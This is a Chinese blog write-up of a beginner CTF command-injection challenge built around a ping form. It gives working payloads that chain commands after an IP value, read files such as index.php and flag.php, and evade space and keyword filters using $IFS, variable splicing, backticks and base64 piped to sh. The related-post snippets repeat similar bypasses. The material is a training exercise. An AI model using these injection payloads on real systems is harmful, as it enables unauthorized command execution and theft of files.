CTF入门笔记之ping

最新推荐文章于 2023-11-18 18:20:47 发布
最新推荐文章于 2023-11-18 18:20:47 发布
阅读量3.9k 收藏 27
点赞数 4
分类专栏: 笔记 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37410729/article/details/109457734
版权

1.用命令行找flag文件

随便ping,然后跟ls

例如:1;ls

在这里插入图片描述
发现index.php文件
1;cat index.php 查看发现就是源网站。
那就向上找
1;ls …/
在这里插入图片描述
继续向上找
直到1;ls …/…/…/
在这里插入图片描述
发现flag 打开
1;cat …/…/…/flag

得到flag

2.绕过过滤打开文件

同样,先查看目录

payload:?ip=1;ls

在这里插入图片描述

发现两个文件,尝试直接打开index文件(虽然知道肯定不行)

payload:?ip=1;cat index.php

果然不行

在这里插入图片描述
猜可能过滤了空格(space),绕过空格过滤有很多方法,
%20、%09、$IFS 1 、 1、 1{IFS}、<>、<还可以用{} 比如 {cat,flag},这里发现$IFS$1可以使用。

payload:?ip=1;cat$IFS$1index.php

在这里插入图片描述
发现一堆过滤,其中还包括flag

接下来就是绕过flag过滤就行了

方法一:拼接flag

payload:?ip=1;a=ag.php;b=fl;cat$IFS$1$b$a

在这里插入图片描述
在网站源码中可以看到flag

方法二:内联执行绕过(即``)

payload:?ip=1;cat$IFS$1`ls`

使用内联执行会将 ``内的输出作为前面命令的输入。

在这里插入图片描述
同样在源码中可以看到flag

方法三:base64编码绕过

payload:?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Y2F0IGZsYWcucGhw即cat flag.php的base64编码

在这里插入图片描述
同上。在源码中找到flag。

SevenCold
关注
  • 4
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctf入门专用.rar
03-01
CTF入门专用pdf文档,学完改文档,你入门是没有问题了, 1.基础知识篇 2.工具篇 3.分类技巧篇 4.高级篇 5.题解篇 6.实战篇 7.学术篇
12-安全配置指导-Password Control配置.pdf
12-21
12-安全配置指导-Password Control配置.pdf
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF入门指导
07-18
CTF入门指导,包含以下文档:Crypto.Code介绍.pdf;misc-写在前面的话.doc;PWN入门指导.docx;PWN入门指导.pdf;rev-知识储备.doc;Web基础-Cookie介绍.docx;Web基础-HTML介绍.docx;Web基础-HTTP协议.docx;Web基础-SQL语言入门.docx。 是CTF新手入门的得力法宝!!!
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1415
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
ctf-ping命令执行
qq_45414878的博客
11-08 9236
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9411
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1417
ctf获取flag入门
CTF——ping相关
jklw4的博客
09-12 4083
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping 题目
ctf】命令执行漏洞(二)
wlllllianqing的博客
10-15 310
命令执行漏洞(二) 命令执行无回显的判定方法 1.延时 2.http请求 3.dns请求 可使用ping请求,但是nc无法监听ping请求。 linux下的ping不会停止,windows下面的ping会停止 ping -c 3 xxx.xxx.xxx -c 3:ping3次 利用 1.写shell 2.http/dns等方式带出数据 '>'符号:将前面的命令生成的内容写到一个文件中 因为ping ip 是不能出现空格的,所以我们可以构造来消除空格 ...
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
CTF入门基础pdf版
05-05
CTF入门基础
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 722
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
[GXYCTF2019]Ping Ping Ping 解题思路(保姆级)
qq_61861243的博客
09-23 226
7、通过查看index.php文件既然只过滤空格、flag,我们就通过$IFS$1绕过空格过滤,使用变量合成flag绕过flag过滤,成功拿到flag(使用cat查看需要查看源代码得到flag、tac查看直接得到flag)1、既然过滤空格、flag我们就通过base64将cat flag.php进行base64加密再通过base64 -d解密执行操作得到flag(cat、tac查看方法同理、base64加解密网站。3、然后我查看了一下他的目录,发现了一个flag.php和一个index.php文件。
经典ctf ping题目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 1032
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
ctfping命令执行绕过
m0_75178803的博客
10-10 695
相关wp参考在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令方式:command1;command2用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败,所有命令都会执行。方式:command1 | commandLinux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。总之就是,
BUUCTF [GXYCTF2019]Ping Ping Ping easywill
m0_62107966的博客
09-24 644
BUUCTF [GXYCTF2019]Ping Ping Ping easywill`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码。发现有两个文件,一个是flag.php,另一个是index.php。考点:ping命令相关命令执行。过滤了很多东西,包括flag。这里过滤了flag和空格。使用ls命令查询目录。
BUUCTF学习(5): 命令执行Ping
初尘屿风的博客
10-16 253
-
利用cookie获取admin权限 CTF基础题
热门推荐
qq_37410729的博客
10-23 1万+
一道很基础的ctf cookie题,如果对cookie不太了解的话,可以去这里看看 https://blog.csdn.net/playboyanta123/article/details/79464684 话不多说,直接上图。 源代码是一些没用的东西。 根据题意,我们直接用burp拦截,改cookie 裸抓包后提示权限不足,我们直接改cookie。 比较cookie中的u和r 会发现都是351e766803开头,所以我们把后面的东西拿去解密(MD5)一下。 发现u是username,r是lim
ctf 入门例题 解析
最新发布
01-12
CTF(Capture The Flag)是一种网络安全竞赛,旨在考验参赛者在网络攻防、密码学、逆向工程等方面的综合能力。CTF入门例题主要是为了帮助初学者了解CTF比赛的基本题型和解题思路。 首先,入门例题通常会涉及到一些基础的密码学知识,比如凯撒密码、栅栏密码、Base64编码等。参赛者需要学会使用密码学工具对加密文本进行解密,并根据解密后的明文找到关键信息。 其次,逆向工程也是CTF入门例题中的常见题型。参赛者需要逆向分析给定的二进制文件或者程序,找到隐藏在其中的关键信息或者漏洞,并进行利用。 还有,网络攻防也是CTF入门例题的一部分。这种题型主要是要求参赛者从网络通信中获取信息,利用网络协议的漏洞或者安全机制来实现攻击或者防御。参赛者需要熟悉TCP/IP协议、HTTP协议等基础网络知识,并能够利用网络抓包工具来获取通信数据。 总之,CTF入门例题旨在引导初学者了解CTF比赛的基本题型和解题思路,同时培养他们在网络攻防、密码学、逆向工程等方面的综合能力。通过不断练习和挑战,参赛者可以逐渐提升自己的技能,从而在CTF竞赛中取得更好的成绩。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值